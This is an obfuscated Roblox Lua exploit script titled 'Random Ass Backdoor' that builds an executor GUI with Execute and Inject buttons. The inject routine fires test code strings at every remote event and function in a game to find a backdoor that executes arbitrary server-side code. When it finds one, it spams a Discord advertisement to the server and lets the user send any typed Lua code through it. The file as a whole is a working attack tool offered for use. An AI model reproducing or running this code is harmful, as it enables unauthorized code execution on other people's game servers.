--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=Instance.new("ScreenGui");local v1=Instance.new("Frame");local v2=Instance.new("UICorner");local v3=Instance.new("TextLabel");local v4=Instance.new("ImageLabel");local v5=Instance.new("TextBox");local v6=Instance.new("TextButton");local v7=Instance.new("TextButton");local v8=Instance.new("TextButton");local v9=Instance.new("TextButton");v0.Parent=game.Players.LocalPlayer:WaitForChild("PlayerGui");v0.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v1.Parent=v0;v1.BackgroundColor3=Color3.fromRGB(0,0,0);v1.BorderColor3=Color3.fromRGB(0,0,0);v1.BorderSizePixel=0;v1.Position=UDim2.new(0.248322144,0,0.35603112,0);v1.Size=UDim2.new(0,305,0,185);v2.CornerRadius=UDim.new(0,3);v2.Parent=v1;v3.Parent=v1;v3.BackgroundColor3=Color3.fromRGB(255,255,255);v3.BackgroundTransparency=1;v3.BorderColor3=Color3.fromRGB(0,0,0);v3.BorderSizePixel=0;v3.Position=UDim2.new(0.144262299,0,0,0);v3.Size=UDim2.new(0,252,0,50);v3.Font=Enum.Font.SourceSans;v3.Text="Random Ass Backdoor";v3.TextColor3=Color3.fromRGB(255,255,255);v3.TextSize=25;v3.TextXAlignment=Enum.TextXAlignment.Left;v4.Parent=v1;v4.BackgroundColor3=Color3.fromRGB(255,255,255);v4.BackgroundTransparency=1;v4.BorderColor3=Color3.fromRGB(0,0,0);v4.BorderSizePixel=0;v4.Size=UDim2.new(0,50,0,50);v4.Image="rbxasset://textures/ui/GuiImagePlaceholder.png";v5.Parent=v1;v5.BackgroundColor3=Color3.fromRGB(44,44,44);v5.BackgroundTransparency=0.5;v5.BorderColor3=Color3.fromRGB(0,0,0);v5.BorderSizePixel=0;v5.Position=UDim2.new(0.321311474,0,0.270270258,0);v5.Size=UDim2.new(0,198,0,124);v5.Font=Enum.Font.SourceSans;v5.Text="Discord: envysplague";v5.TextColor3=Color3.fromRGB(0,0,0);v5.TextSize=14;v5.TextXAlignment=Enum.TextXAlignment.Left;v5.TextYAlignment=Enum.TextYAlignment.Top;v6.Parent=v1;v6.BackgroundColor3=Color3.fromRGB(44,44,44);v6.BorderColor3=Color3.fromRGB(0,0,0);v6.BorderSizePixel=0;v6.Position=UDim2.new(0.0262295082,0,0.74594593,0);v6.Size=UDim2.new(0,75,0,36);v6.Font=Enum.Font.SourceSans;v6.Text="Execute";v6.TextColor3=Color3.fromRGB(0,0,0);v6.TextSize=20;v7.Parent=v1;v7.BackgroundColor3=Color3.fromRGB(44,44,44);v7.BorderColor3=Color3.fromRGB(0,0,0);v7.BorderSizePixel=0;v7.Position=UDim2.new(0.0262295082,0,0.270270258,0);v7.Size=UDim2.new(0,75,0,36);v7.Font=Enum.Font.SourceSans;v7.Text="Clear";v7.TextColor3=Color3.fromRGB(0,0,0);v7.TextSize=20;v8.Parent=v1;v8.BackgroundColor3=Color3.fromRGB(44,44,44);v8.BorderColor3=Color3.fromRGB(0,0,0);v8.BorderSizePixel=0;v8.Position=UDim2.new(0.0262295082,0,0.508108079,0);v8.Size=UDim2.new(0,75,0,36);v8.Font=Enum.Font.SourceSans;v8.Text="Inject";v8.TextColor3=Color3.fromRGB(0,0,0);v8.TextSize=20;v9.Parent=v1;v9.BackgroundColor3=Color3.fromRGB(255,255,255);v9.BackgroundTransparency=1;v9.BorderColor3=Color3.fromRGB(0,0,0);v9.BorderSizePixel=0;v9.Position=UDim2.new(0.885245919,0,0,0);v9.Size=UDim2.new(0,35,0,35);v9.Font=Enum.Font.SourceSans;v9.Text="x";v9.TextColor3=Color3.fromRGB(255,0,0);v9.TextSize=30;v9.TextYAlignment=Enum.TextYAlignment.Top;local function v98() local v109=Instance.new("LocalScript",v1);local v110=v109.Parent;local v111=game:GetService("UserInputService");local v112=false;local v113;local v114;local v115;local function v116(v156) local v157=v156.Position-v114 ;v110.Position=UDim2.new(v115.X.Scale,v115.X.Offset + v157.X ,v115.Y.Scale,v115.Y.Offset + v157.Y );end v110.InputBegan:Connect(function(v159) if ((v159.UserInputType==Enum.UserInputType.MouseButton1) or (v159.UserInputType==Enum.UserInputType.Touch)) then v112=true;v114=v159.Position;v115=v110.Position;v159.Changed:Connect(function() if (v159.UserInputState==Enum.UserInputState.End) then v112=false;end end);end end);v110.InputChanged:Connect(function(v160) if ((v160.UserInputType==Enum.UserInputType.MouseMovement) or (v160.UserInputType==Enum.UserInputType.Touch)) then v113=v160;end end);v111.InputChanged:Connect(function(v161) if ((v161==v113) and v112) then v116(v161);end end);end coroutine.wrap(v98)();local function v99() local v117=Instance.new("LocalScript",v3);local v118=v117.Parent;local v119=0;while true do v119=v119 + 0.01 ;if (v119>1) then v119=0;end v118.TextColor3=Color3.fromHSV(v119,1,1);task.wait(0.03);end end coroutine.wrap(v99)();local function v100() local v120=Instance.new("LocalScript",v4);local v121=game:GetService("Players");local v122=v121.LocalPlayer;local v123=v120.Parent.Parent.ImageLabel;if (v123 and v122) then local v187=v122.UserId;local v188="https://www.roblox.com/avatar-thumbnail/image?userId="   .. v187   .. "&width=420&height=420&format=png&type=bust" ;v123.Image=v188;end end coroutine.wrap(v100)();local function v101() local v124=Instance.new("LocalScript",v5);local v125=v124.Parent;local v126=0;while true do v126=v126 + 0.01 ;if (v126>1) then v126=0;end v125.TextColor3=Color3.fromHSV(v126,1,1);task.wait(0.03);end end coroutine.wrap(v101)();local function v102() local v127=Instance.new("LocalScript",v5);local v128=v127.Parent;local v129=game:GetService("UserInputService");v128.TextWrapped=true;v128.MultiLine=true;local v132;local function v133(v164,v165) if ((v164.UserInputType==Enum.UserInputType.Keyboard) and (v164.KeyCode==Enum.KeyCode.Return)) then v128:ReleaseFocus();end end v128.Focused:Connect(function() v132=v129.InputBegan:Connect(v133);end);v128.FocusLost:Connect(function() if v132 then v132:Disconnect();v132=nil;end end);end coroutine.wrap(v102)();local function v103() local v134=Instance.new("LocalScript",v6);local v135=v134.Parent;local v136=0;while true do v136=v136 + 0.01 ;if (v136>1) then v136=0;end v135.TextColor3=Color3.fromHSV(v136,1,1);task.wait(0.03);end end coroutine.wrap(v103)();local function v104() local v137=Instance.new("LocalScript",v7);local v138=v137.Parent;local v139=0;while true do v139=v139 + 0.01 ;if (v139>1) then v139=0;end v138.TextColor3=Color3.fromHSV(v139,1,1);task.wait(0.03);end end coroutine.wrap(v104)();local function v105() local v140=Instance.new("LocalScript",v8);local v141=v140.Parent;local v142=0;while true do v142=v142 + 0.01 ;if (v142>1) then v142=0;end v141.TextColor3=Color3.fromHSV(v142,1,1);task.wait(0.03);end end coroutine.wrap(v105)();local function v106() local v143=Instance.new("LocalScript",v9);v143.Parent.MouseButton1Click:Connect(function() v143.Parent.Parent.Visible=false;end);end coroutine.wrap(v106)();local function v107() local v144=Instance.new("LocalScript",v1);local v145=v144.Parent.Parent;v145.ResetOnSpawn=false;end coroutine.wrap(v107)();local function v108() local v147={"a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"};local v148=nil;local v149=game:GetService("HttpService");local v150=false;local function v151(v170,v171) local v172=print;if (v171==1) then v172=print;end if (v171==2) then v172=error;end if (v171==3) then v172=warn;end v172("Backdoor Scanner: "   .. v170 );end local function v152(v173) game:GetService("StarterGui"):SetCore("SendNotification",{Title="Backdoor Scanner",Duration=6,Text=v173});end local function v153(v174,v175) if v174:IsA("RemoteEvent") then v174:FireServer(v175);elseif v174:IsA("RemoteFunction") then spawn(function() v174:InvokeServer(v175);end);end end local function v154(v176) local v177="";for v190=1,v176 do v177=v177   .. v147[math.random(1, #v147)] ;end return v177;end local function v155() local v178=os.clock();local v179={};local v180;local v181=game:GetService("ReplicatedStorage"):FindFirstChild("lh"   .. ((game.PlaceId/6666) * 1337 * game.PlaceId) );if (v181 and v181:IsA("RemoteFunction")) then while true do v180=v154(math.random(12,30));if  not v179[v180] then break;end end spawn(function() v181:InvokeServer("backdoor scanner","a=Instance.new('Model',workspace)a.Name='"   .. v180   .. "'" );end);v179[v180]=v181;end for v191,v192 in game:GetDescendants() do if  not (v192:IsA("RemoteEvent") or v192:IsA("RemoteFunction")) then continue;end if (string.split(v192:GetFullName(),".")[1]=="RobloxReplicatedStorage") then v151("Roblox Replicated Storage ("   .. v192.Name   .. ")" ,1);continue;end if ((v192.Parent==game:GetService("ReplicatedStorage")) or (v192.Parent.Parent==game:GetService("ReplicatedStorage")) or (v192.Parent.Parent.Parent==game:GetService("ReplicatedStorage"))) then if (v192:FindFirstChild("__FUNCTION") or (v192.Name=="__FUNCTION")) then v151("Adonis filter detected ("   .. v192.Name   .. ")" ,1);continue;end if ((v192.Parent.Parent.Name=="HDAdminClient") and (v192.Parent.Name=="Signals")) then v151("HD Admin ("   .. v192.Name   .. ")" ,1);continue;end if (v192.Parent.Name=="DefaultChatSystemChatEvents") then v151("Chat event ("   .. v192.Name   .. ")" ,1);continue;end end while true do v180=v154(math.random(12,30));if  not v179[v180] then break;end end v153(v192,"a=Instance.new('Model',workspace)a.Name='"   .. v180   .. "'" );v179[v180]=v192;v151('Tested remote "'   .. v192:GetFullName()   .. '"' ,1);end for v194=1,100 do for v198,v199 in pairs(v179) do if workspace:FindFirstChild(v198) then v152("Backdoor found! "   .. (os.clock() -v178)   .. "s" );v148=v199;v151(v199:GetFullName(),3);v153(v199,"a=Instance.new('Hint')a.Text='Discord: envysplague, Discord.gg/kd9ET5B3TF'while true do a.Parent=workspace;wait(15)a:Remove()wait(30)end");return true;end end wait(0.1);end return false;end v6.MouseButton1Click:Connect(function() local v182=v5.Text;if v148 then v153(v148,v182);v6.Text="Executed!";task.wait(0.5);v6.Text="Execute";else v152("No backdoor found yet!");end end);v7.MouseButton1Click:Connect(function() v5.Text="";v7.Text="Cleared!";task.wait(0.5);v7.Text="Clear";end);v8.MouseButton1Click:Connect(function() if  not v150 then v150=true;v151("Scanning for backdoors...",3);v8.Text="Scanning...";if  not v155() then v8.Text="Failure";v150=false;else v8.Text="Injected";v150=false;end end end);game:GetService("UserInputService").InputBegan:Connect(function(v185,v186) if ((v185.KeyCode==Enum.KeyCode.LeftAlt) and  not v186) then v1.Visible= not v1.Visible;end end);end v108();
